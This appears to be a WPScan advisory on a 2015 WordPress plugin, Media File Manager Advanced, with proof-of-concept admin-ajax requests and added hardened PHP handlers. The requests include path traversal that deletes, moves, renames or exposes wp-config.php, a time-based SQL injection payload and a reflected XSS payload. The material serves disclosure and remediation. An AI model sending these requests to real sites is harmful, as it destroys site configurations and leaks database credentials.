Media File Manager Advanced <= 1.1.5 - Multiple Vulnerabilities


Description
Media File Manager Advanced allows any authenticated user (a subscriber-level account is enough) to execute administrator-level actions, because the plugin's admin-ajax.php action handlers do not adequately check the caller's permissions.

Through these handlers an attacker can delete and update posts; create, remove and list directories; and move, rename and delete files. The directory and file parameters are not confined to wp-content/uploads, so a value such as dir=../../ reaches the WordPress root. The mfma_relocator_get_image_insert_screen action is additionally vulnerable to time-based blind SQL injection and reflected cross-site scripting.
Proof of Concept
Post Delete
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete
POST data: id=17

MKDIR
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_mkdir
newdir=EVEXFOLDER

result: the folder now exists at http://domain.tld/wp-content/uploads/EVEXFOLDER

RMDIR (the directory must be empty)
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete_empty_dir
dir=EVEXFOLDER&name=

result: http://domain.tld/wp-content/uploads/EVEXFOLDER no longer exists

UNLINK (same action name as Post Delete, but with dir/name parameters instead of id)
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_delete
dir=../../&name=wp-config.php

result: wp-config.php is deleted from the WordPress root (dir=../../ resolves from wp-content/uploads/ up to the site root). This is destructive: without wp-config.php the site stops working, so on a real engagement use a harmless file to prove the traversal.

Blind SQL Injection (time-based)
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen
id=1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ)

result: the response is delayed by 10 seconds, confirming that the id parameter is concatenated into the query unescaped

XSS (reflected)
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_get_image_insert_screen
id="</button><script>alert(1)</script>

result: the id value is reflected into the HTML response without encoding and the injected script executes (alert(1))
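Both findings above sit in one handler, so the hardened form of that handler is shown here as an added example. This is not the plugin's code: what the original handler does with the attachment ID beyond looking it up is not on this page, and the capability, nonce action name ('mfma_relocator') and rendered markup are assumptions. The point is the three controls the PoC proves missing: an authorization gate, a parameterised query, and context-correct output encoding.

```php
<?php
/**
 * Added example (not plugin code): hardened handler for
 * action=mfma_relocator_get_image_insert_screen.
 * Assumed: the handler looks up an attachment by ID and returns a snippet
 * of HTML for the insert screen; 'mfma_relocator' is a hypothetical nonce
 * action name.
 */
add_action( 'wp_ajax_mfma_relocator_get_image_insert_screen', 'mfma_hardened_get_image_insert_screen' );

function mfma_hardened_get_image_insert_screen() {
    global $wpdb;

    // 1. Authorization: require a media-management capability, not merely
    //    "is logged in". A subscriber fails here before anything else runs.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'forbidden', 403 ); // wp_send_json_error() exits
    }

    // 2. CSRF: the nonce must have been issued to this user for this action
    //    (check_ajax_referer() dies on failure).
    check_ajax_referer( 'mfma_relocator', 'nonce' );

    // 3. Type coercion removes the injection surface entirely:
    //    "1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ)" becomes the integer 1.
    $id = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;
    if ( 0 === $id ) {
        wp_send_json_error( 'invalid id', 400 );
    }

    // 4. Keep the query parameterised anyway, so a later change to a string
    //    column cannot quietly reintroduce string concatenation.
    $row = $wpdb->get_row(
        $wpdb->prepare(
            "SELECT ID, post_title, guid FROM {$wpdb->posts}
              WHERE ID = %d AND post_type = 'attachment'",
            $id
        )
    );
    if ( ! $row ) {
        wp_send_json_error( 'not found', 404 );
    }

    // 5. Encode for the context each value lands in: esc_attr() inside
    //    attributes, esc_html() in text nodes, esc_url() in src/href.
    //    A value like "</button><script>alert(1)</script> is now rendered
    //    as literal text instead of closing the button element.
    $html  = '<button type="button" data-id="' . esc_attr( $row->ID ) . '">';
    $html .= esc_html( $row->post_title );
    $html .= '</button>';
    $html .= '<img src="' . esc_url( $row->guid ) . '" alt="' . esc_attr( $row->post_title ) . '">';

    wp_send_json_success( array( 'html' => $html ) );
}
```

The order matters: the capability check and nonce run before any parameter is read, so an unauthorized caller never reaches the database at all, and the SLEEP-based timing oracle cannot be used to probe the query even by a low-privileged user.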

Update Post
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_update_media_information
id=34&title=New_Title&caption=bla&description=Dummy Description

Move Files
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_move
dir_from=../../&items=wp-config.php&dir_to=

result: wp-config.php is moved from the WordPress root to /wp-content/uploads/wp-config.php (dir_from is traversable in the same way as dir in the UNLINK request; moving wp-config.php also breaks the site)

Renaming Files
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_rename
dir=../../&from=wp-config.php&to=wp-config.txt

result: wp-config.php in the WordPress root is renamed to wp-config.txt; as a .txt file inside the web root it can be downloaded directly, which exposes the database credentials it contains

Directory Listing
http://domain.tld/wp-admin/admin-ajax.php?action=mfma_relocator_getdir
dir=../../

result: lists all files and directories in the WordPress root (two levels above wp-content/uploads/)
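All of the file and directory actions above share two defects: no authorization gate, and a dir/name pair that is joined to the uploads path without canonicalisation, so "../../" walks up to the WordPress root. The block below is an added example (not the plugin's code) of how a hardened version confines every path to wp-content/uploads before touching the disk, shown for the delete and rename actions; function names, the nonce action name and the 'upload_files' capability are assumptions, and the plugin's real handler bodies were not examined.

```php
<?php
/**
 * Added example (not plugin code): authorization gate plus path confinement
 * for the filesystem actions (mfma_relocator_delete, _mkdir,
 * _delete_empty_dir, _move, _rename, _getdir). Names below are hypothetical.
 */

// Every filesystem handler runs through the same gate first.
function mfma_hardened_gate() {
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'forbidden', 403 );   // exits
    }
    check_ajax_referer( 'mfma_relocator', 'nonce' ); // dies on failure
}

/**
 * Resolve an untrusted relative path to an absolute path that is provably
 * inside wp-content/uploads. Returns false on any escape attempt.
 *
 * @param string $relative   User-supplied "dir" (may be '').
 * @param string $name       Optional user-supplied file or directory name.
 * @param bool   $must_exist True for sources; false for a new mkdir/rename target.
 */
function mfma_confine_to_uploads( $relative, $name = '', $must_exist = true ) {
    $upload = wp_upload_dir();
    $base   = realpath( $upload['basedir'] );
    if ( false === $base ) {
        return false;
    }
    $base = trailingslashit( wp_normalize_path( $base ) );

    // NUL bytes truncate paths in C-level calls; names must be a single leaf.
    if ( false !== strpos( $relative . $name, "\0" ) ) {
        return false;
    }
    if ( '' !== $name && ( $name !== basename( $name ) || '.' === $name || '..' === $name ) ) {
        return false;
    }

    // wp_normalize_path() collapses duplicate slashes; realpath() below
    // collapses ".." segments and symlinks, which is what defeats "../../".
    $candidate = wp_normalize_path( $base . ltrim( $relative, '/' ) . ( '' !== $name ? '/' . $name : '' ) );

    if ( $must_exist ) {
        $resolved = realpath( $candidate );
        if ( false === $resolved ) {
            return false;
        }
        $resolved = wp_normalize_path( $resolved );
        // "/var/www/wp-config.php/" does not start with "/var/www/wp-content/uploads/".
        return ( 0 === strpos( trailingslashit( $resolved ), $base ) ) ? $resolved : false;
    }

    // Target does not exist yet: its parent must resolve inside the base.
    $parent = realpath( dirname( $candidate ) );
    if ( false === $parent ) {
        return false;
    }
    $parent = trailingslashit( wp_normalize_path( $parent ) );
    return ( 0 === strpos( $parent, $base ) ) ? $parent . basename( $candidate ) : false;
}

// action=mfma_relocator_delete with dir=../../&name=wp-config.php now fails
// at the confinement step, and a subscriber fails at the gate before that.
add_action( 'wp_ajax_mfma_relocator_delete', function () {
    mfma_hardened_gate();
    $dir  = isset( $_POST['dir'] )  ? sanitize_text_field( wp_unslash( $_POST['dir'] ) )  : '';
    $name = isset( $_POST['name'] ) ? sanitize_text_field( wp_unslash( $_POST['name'] ) ) : '';
    $path = mfma_confine_to_uploads( $dir, $name );
    if ( false === $path || ! is_file( $path ) ) {
        wp_send_json_error( 'invalid path', 400 );
    }
    wp_send_json_success( array( 'deleted' => unlink( $path ) ) );
} );

// action=mfma_relocator_rename: the source must exist inside uploads; the
// target need not exist, but its parent directory must be inside uploads.
add_action( 'wp_ajax_mfma_relocator_rename', function () {
    mfma_hardened_gate();
    $dir  = isset( $_POST['dir'] )  ? sanitize_text_field( wp_unslash( $_POST['dir'] ) )  : '';
    $from = isset( $_POST['from'] ) ? sanitize_text_field( wp_unslash( $_POST['from'] ) ) : '';
    $to   = isset( $_POST['to'] )   ? sanitize_text_field( wp_unslash( $_POST['to'] ) )   : '';
    $src  = mfma_confine_to_uploads( $dir, $from );
    $dst  = mfma_confine_to_uploads( $dir, $to, false );
    if ( false === $src || false === $dst || file_exists( $dst ) ) {
        wp_send_json_error( 'invalid path', 400 );
    }
    wp_send_json_success( array( 'renamed' => rename( $src, $dst ) ) );
} );
```

The confinement deliberately compares the realpath() result rather than looking for ".." in the input: encoded or mixed separators, symlinks placed in uploads, and trailing-slash tricks all collapse to a concrete absolute path, and only a prefix match against the canonical uploads directory is accepted. The same helper serves mkdir (target, must_exist=false), delete_empty_dir and getdir (source, must_exist=true), and move (one of each).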

Affects

Plugin media-file-manager-advanced (versions <= 1.1.5)

References

PACKETSTORM 131949
URL http://web.archive.org/web/20150912142109/http://research.evex.pw/?vuln=16

Classification

Type MULTI

Miscellaneous

Submitter A. Samman
Submitter Twitter Evex_1337
Views 350
Verified No
WPVDB ID 7983

Timeline

Publicly Published 2015-05-13 (over 1 year ago)
Added 2015-05-13 (over 1 year ago)
Last Updated 2016-04-24 (8 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site are Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.